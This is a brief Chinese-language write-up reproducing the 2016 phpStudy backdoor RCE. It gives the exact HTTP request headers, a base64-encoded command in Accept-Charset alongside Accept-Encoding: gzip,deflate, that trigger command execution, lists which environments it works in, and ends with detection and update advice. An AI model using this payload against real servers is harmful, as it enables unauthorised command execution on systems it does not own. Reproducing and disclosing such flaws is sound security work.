phpstudy rce 复现

phpstudy 在2016年被入侵植入后门，前几天被爆出来

相关文章：

• https://www.anquanke.com/post/id/187208
• https://www.anquanke.com/post/id/187152
• https://www.anquanke.com/post/id/187202

rce 复现

首先安装带后门的 phpstudy，启动

访问任意一个 php 文件，带上 payload

Accept-Charset: ZWNobyBgaXBjb25maWdgOw==
Accept-Encoding: gzip,deflate

Accept-Charset 的值是 base64 编码的命令

我自己测试，只有 php 5.2 + apahce,php 5.4 +apache,php 5.2 +nginx 这三种环境能够利用

防御

可以下载官网的检测工具检测有无后门，从官网下载最新版本